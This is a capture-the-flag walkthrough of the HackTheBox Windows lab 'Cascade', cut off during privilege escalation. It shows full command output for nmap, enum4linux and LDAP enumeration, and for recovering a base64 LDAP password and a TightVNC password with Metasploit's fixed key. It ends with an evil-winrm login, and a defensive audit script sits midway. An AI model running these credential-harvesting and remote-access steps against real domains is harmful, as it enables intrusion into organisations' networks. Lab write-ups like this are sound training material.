Cascade is one of the machines currently available on the HackTheBox hacking platform and is rated medium difficulty.
In this case it is a machine based on the Windows operating system.
Port scanning
As usual, we add the IP of the Cascade machine, 10.10.10.182, to /etc/hosts as cascade.htb and begin with an nmap port scan.
```text
# Nmap 7.80 scan initiated Fri May 15 00:35:15 2020 as: nmap -sV -Pn -p- -oA cascade-nmap 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.055s latency).
Not shown: 65520 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-14 22:48:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 15 00:45:39 2020 -- 1 IP address (1 host up) scanned in 623.75 seconds
```
We find several open ports, which we go on to enumerate below.
Enumeration
We begin enumeration with the enum4linux tool, which gives us information on the domain, the users and the groups of the system, among other things.
```text
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 00:52:41 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.182
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.182    |
 ====================================================
[E] Can't find workgroup/domain

 ============================================
|    Nbtstat Information for 10.10.10.182    |
 ============================================
Looking up status of 10.10.10.182
No reply from 10.10.10.182

 =====================================
|    Session Check on 10.10.10.182    |
 =====================================
[+] Server 10.10.10.182 allows sessions using username '', password ''
[+] Got domain/workgroup name:

 ===========================================
|    Getting domain SID for 10.10.10.182    |
 ===========================================
Domain Name: CASCADE
Domain Sid: S-1-5-21-3332504370-1206983947-1165150453
[+] Host is part of a domain (not a workgroup)

 ======================================
|    OS information on 10.10.10.182    |
 ======================================
[+] Got OS info for 10.10.10.182 from smbclient:
[+] Got OS info for 10.10.10.182 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =============================
|    Users on 10.10.10.182    |
 =============================
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull    Name: Adrian Turnbull       Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc        Name: ArkSvc                Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson      Name: Ben Hanson            Desc: (null)
index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc     Name: BackupSvc             Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest     Name: (null)                Desc: Built-in account for guest access to the computer/domain
index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman      Name: David Burman          Desc: (null)
index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe       Name: Edward Crowe          Desc: (null)
index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft       Name: Ian Croft             Desc: (null)
index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen       Name: Joseph Allen          Desc: (null)
index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand    Name: John Goodhand         Desc: (null)
index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield   Name: James Wakefield       Desc: (null)
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson    Name: Ryan Thompson         Desc: (null)
index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson     Name: Stephanie Hickson     Desc: (null)
index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith       Name: Steve Smith           Desc: (null)
index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util          Name: Util                  Desc: (null)

user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

 =========================================
|    Share Enumeration on 10.10.10.182    |
 =========================================

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.182

 ====================================================
|    Password Policy Information for 10.10.10.182    |
 ====================================================
[+] Attaching to 10.10.10.182 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.182)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
	[+] CASCADE
	[+] Builtin
[+] Password Info for Domain: CASCADE
	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: Not Set
	[+] Password Complexity Flags: 000000
		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0
	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes
	[+] Locked Account Duration: 30 minutes
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

 ==============================
|    Groups on 10.10.10.182    |
 ==============================

[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]

[+] Getting builtin group memberships:
Group 'Guests' (RID: 546) has member: CASCADE\CascGuest
Group 'Guests' (RID: 546) has member: CASCADE\Domain Guests
Group 'Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: CASCADE\Domain Users

[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[IT] rid:[0x459]
group:[Production] rid:[0x45a]
group:[HR] rid:[0x45b]
group:[AD Recycle Bin] rid:[0x45f]
group:[Backup] rid:[0x460]
group:[Temps] rid:[0x463]
group:[WinRMRemoteWMIUsers__] rid:[0x465]
group:[Remote Management Users] rid:[0x466]
group:[Factory] rid:[0x46c]
group:[Finance] rid:[0x46d]
group:[Audit Share] rid:[0x471]
group:[Data Share] rid:[0x472]

[+] Getting local group memberships:
Group 'Remote Management Users' (RID: 1126) has member: CASCADE\arksvc
Group 'Remote Management Users' (RID: 1126) has member: CASCADE\s.smith
Group 'IT' (RID: 1113) has member: CASCADE\arksvc
Group 'IT' (RID: 1113) has member: CASCADE\s.smith
Group 'IT' (RID: 1113) has member: CASCADE\r.thompson
Group 'HR' (RID: 1115) has member: CASCADE\s.hickson
Group 'Data Share' (RID: 1138) has member: CASCADE\Domain Users
Group 'Audit Share' (RID: 1137) has member: CASCADE\s.smith
Group 'AD Recycle Bin' (RID: 1119) has member: CASCADE\arksvc
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\krbtgt
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Schema Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Enterprise Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Cert Publishers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Group Policy Creator Owners
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Read-only Domain Controllers

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]

[+] Getting domain group memberships:
Group 'Group Policy Creator Owners' (RID: 520) has member: CASCADE\administrator
Group 'Domain Guests' (RID: 514) has member: CASCADE\CascGuest
Group 'Domain Users' (RID: 513) has member: CASCADE\administrator
Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc
Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith
Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
Group 'Domain Users' (RID: 513) has member: CASCADE\util
Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman
Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen
Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft

 =======================================================================
|    Users on 10.10.10.182 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
[I] Found new SID: S-1-5-21-3332504370-1206983947-1165150453
[I] Found new SID: S-1-5-21-2189247330-517467924-712900258
[+] Enumerating users using SID S-1-5-21-3332504370-1206983947-1165150453 and logon username '', password ''
S-1-5-21-3332504370-1206983947-1165150453-500 CASCADE\administrator (Local User)
S-1-5-21-3332504370-1206983947-1165150453-501 CASCADE\CascGuest (Local User)
S-1-5-21-3332504370-1206983947-1165150453-502 CASCADE\krbtgt (Local User)
S-1-5-21-3332504370-1206983947-1165150453-512 CASCADE\Domain Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-513 CASCADE\Domain Users (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-514 CASCADE\Domain Guests (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-515 CASCADE\Domain Computers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-516 CASCADE\Domain Controllers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-517 CASCADE\Cert Publishers (Local Group)
S-1-5-21-3332504370-1206983947-1165150453-518 CASCADE\Schema Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-519 CASCADE\Enterprise Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-520 CASCADE\Group Policy Creator Owners (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-521 CASCADE\Read-only Domain Controllers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-1001 CASCADE\CASC-DC1$ (Local User)
[+] Enumerating users using SID S-1-5-21-2189247330-517467924-712900258 and logon username '', password ''
S-1-5-21-2189247330-517467924-712900258-500 CASC-DC1\Administrator (Local User)
S-1-5-21-2189247330-517467924-712900258-501 CASC-DC1\Guest (Local User)
S-1-5-21-2189247330-517467924-712900258-513 CASC-DC1\None (Domain Group)

 =============================================
|    Getting printer info for 10.10.10.182    |
 =============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Fri May 15 00:59:00 2020
```
We continue with LDAP enumeration. A first query against the root DSE gives us more information about the system:
```text
$ ldapsearch -H ldap://10.10.10.182 -x -s base '' "(objectClass=*)" "*"
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: (objectClass=*) *
#

#
dn:
currentTime: 20200515065604.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=cascade,DC=local
dsServiceName: CN=NTDS Settings,CN=CASC-DC1,CN=Servers,CN=Default-First-Site-N
 ame,CN=Sites,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
defaultNamingContext: DC=cascade,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=cascade,DC=local
configurationNamingContext: CN=Configuration,DC=cascade,DC=local
rootDomainNamingContext: DC=cascade,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 319671
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: CASC-DC1.cascade.local
ldapServiceName: cascade.local:casc-dc1$@CASCADE.LOCAL
serverName: CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Conf
 iguration,DC=cascade,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 4
forestFunctionality: 4
domainControllerFunctionality: 4

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```
Knowing more about the domain, we run a second ldapsearch query. I am not pasting the whole output here, but we get an interesting piece of data on the user Ryan Thompson:
```text
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200515065503.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 319671
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132339995497786666
lastLogoff: 0
lastLogon: 132339995816183226
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132339993030642333
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
```
In the last field we see what looks like a password:
```text
cascadeLegacyPwd: clk0bjVldmE=
```
We decode the base64 value and obtain the password of the user r.thompson:
```text
$ echo "clk0bjVldmE="|base64 -d
rY4n5eva
```
We continue enumerating and look for information over SMB, which we found in the scan, using the credentials we just obtained:
```text
$ smbclient -U "r.thompson" -L \\\\10.10.10.182\\
Enter WORKGROUP\r.thompson's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Audit$          Disk
	C$              Disk      Default share
	Data            Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
We continue enumerating with the Data share:
```text
$ smbclient -U "r.thompson" \\\\10.10.10.182\\Data
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 27 04:27:34 2020
  ..                                  D        0  Mon Jan 27 04:27:34 2020
  Contractors                         D        0  Mon Jan 13 02:45:11 2020
  Finance                             D        0  Mon Jan 13 02:45:06 2020
  IT                                  D        0  Tue Jan 28 19:04:51 2020
  Production                          D        0  Mon Jan 13 02:45:18 2020
  Temps                               D        0  Mon Jan 13 02:45:15 2020

		13106687 blocks of size 4096. 7792857 blocks available
smb: \>
```
We find an interesting file in the IT folder and download it:
```text
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
  .                                   D        0  Tue Jan 28 19:00:30 2020
  ..                                  D        0  Tue Jan 28 19:00:30 2020
  Meeting_Notes_June_2018.html        A     2522  Tue Jan 28 19:00:12 2020

		13106687 blocks of size 4096. 7792597 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (11,0 KiloBytes/sec) (average 11,0 KiloBytes/sec)
```
And we review its contents:
```html
<p>-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
```
It tells us that the user TempAdmin was used for the migration and that its password is the same as that of the machine's admin account, which may be very useful later on.
We keep searching and find another file in the user s.smith's folder, which we download:
```text
smb: \IT\Temp\s.smith\> ls
  .                                   D        0  Tue Jan 28 21:00:01 2020
  ..                                  D        0  Tue Jan 28 21:00:01 2020
  VNC Install.reg                     A     2680  Tue Jan 28 20:27:44 2020

		13106687 blocks of size 4096. 7792855 blocks available
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (11,6 KiloBytes/sec) (average 11,2 KiloBytes/sec)
smb: \IT\Temp\s.smith\>
```
Its contents are as follows:
```text
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
```
In it we find credentials in hexadecimal form, but simply decoding the hex does not give us anything that looks like a valid password. Searching Google for the file name, we find a GitHub repository explaining that this value can be decrypted with Metasploit, so we do that to recover the password in plaintext:
```text
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6bcf2a4b6e5aca0f"].pack('H*'), fixedkey
=> "sT333ve2"
```
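Both credential leaks so far (a password kept in a custom LDAP attribute, and a TightVNC password in a .reg export left on a share) are things a domain owner can check for in their own directory exports and file shares. The following Python is an added example, not code from this writeup or from any tool it uses; its LDIF and .reg inputs are constructed to mirror the entries shown above. It unfolds ldapsearch continuation lines, reports non-binary attributes whose value is base64 that decodes to readable text, and reports REG_BINARY values named like a password in a .reg file.

```python
"""Added audit helper, not code from the writeup: flags passwords kept in custom
LDAP attributes (as cascadeLegacyPwd was) and obfuscated TightVNC passwords in
.reg exports. Sample inputs are constructed to mirror the writeup's findings."""
import base64
import re

KNOWN_BINARY_ATTRS = {"objectguid", "objectsid", "ntsecuritydescriptor"}
ATTR_RE = re.compile(r"^([A-Za-z][\w;-]*)(::?) ?(.*)$")
REG_KEY_RE = re.compile(r"^\[(.+)\]$")
REG_HEX_RE = re.compile(r'^"([^"]*)"=hex(?:\(\d+\))?:(.*)$')

SAMPLE_LDIF = """\
# Ryan Thompson, Users, UK, cascade.local (constructed from the writeup's entry)
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
cn: Ryan Thompson
sn: Thompson
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=lo
 cal
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

# Steve Smith (constructed; no legacy attribute)
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
sn: Smith
sAMAccountName: s.smith
"""
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"UseVncAuthentication"=dword:00000001
"Password"=hex:6b,cf,2a,4b,\
  6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"""

def parse_ldif(text):
    """[(dn, {attr: [(value, tool_encoded)]})]. A leading space continues the
    previous line (LDIF folding); '::' marks a value ldapsearch base64-encoded."""
    text = re.sub(r"\r?\n ", "", text)  # unfold "Default-First-Site-N\n ame" style lines
    entries, dn, attrs = [], None, {}
    for line in text.splitlines() + [""]:
        m = ATTR_RE.match(line)  # '#' comment lines never match and are skipped
        if not line.strip():  # a blank line ends the current entry
            if dn is not None:
                entries.append((dn, attrs))
            dn, attrs = None, {}
        elif m and m.group(1).lower() == "dn":
            dn = m.group(3)
        elif m:
            attrs.setdefault(m.group(1), []).append((m.group(3), m.group(2) == "::"))
    return entries

def decode_text_secret(value):
    """Decoded string if value is strict base64 of printable ASCII, else None.
    Plain numbers and names fail the padding or printability checks."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # bad alphabet or padding, or non-ASCII bytes
        return None
    return text if text and text.isprintable() else None

def find_ldap_text_secrets(ldif_text):
    """(sAMAccountName, attribute, decoded text) for every non-binary attribute
    whose stored value is base64 of readable text."""
    findings = []
    for dn, attrs in parse_ldif(ldif_text):
        sam = attrs.get("sAMAccountName", [(dn, False)])[0][0]
        for name, values in attrs.items():
            if name.lower() in KNOWN_BINARY_ATTRS:
                continue
            for value, tool_encoded in values:
                text = None if tool_encoded else decode_text_secret(value)
                if text is not None:
                    findings.append((sam, name, text))
    return findings

def find_reg_hex_passwords(reg_text):
    """(key, value name, hex string) for every REG_BINARY value whose name
    contains 'password'. TightVNC only obfuscates this value with a fixed DES
    key (the writeup recovers it via Metasploit), so it is an exposed credential."""
    findings, key = [], None
    # regedit splits long hex values over lines ending in a backslash
    for line in re.sub(r"\\\r?\n\s*", "", reg_text).splitlines():
        line = line.strip()
        km, vm = REG_KEY_RE.match(line), REG_HEX_RE.match(line)
        if km:
            key = km.group(1)
        elif vm and "password" in vm.group(1).lower():
            findings.append((key, vm.group(1), re.sub(r"[,\s]", "", vm.group(2)).lower()))
    return findings

if __name__ == "__main__":
    for sam, attr, _ in find_ldap_text_secrets(SAMPLE_LDIF):
        print(f"LDAP: {sam} stores readable text in attribute {attr}")
    for key, name, hx in find_reg_hex_passwords(SAMPLE_REG):
        print(f"REG: {key}\\{name} holds {len(hx) // 2} obfuscated bytes")
```

Run it against a real `ldapsearch -x ... "(objectClass=user)"` dump and the .reg files found on shares; any hit is an attribute or file to clean up and a password to rotate.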
Getting the user flag
With the credentials of the user s.smith obtained in the last step, we access the machine using the evil-winrm tool:
```text
$ ruby evil-winrm.rb -i 10.10.10.182 -u "s.smith" -p 'sT333ve2'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\s.smith\desktop> dir


    Directory: C:\Users\s.smith\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/15/2020   2:56 PM             34 user.txt


*Evil-WinRM* PS C:\Users\s.smith\desktop>
```
And we have the user flag. This machine required a lot of enumeration to get this far, but we are still only halfway there.
Privilege escalation
Now we need to look for a way to escalate to the Administrator user. First we check the permissions and groups of the user s.smith:
```text
*Evil-WinRM* PS C:\> whoami /all

USER INFORMATION
----------------

User Name       SID
=============== ==============================================
cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                         Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
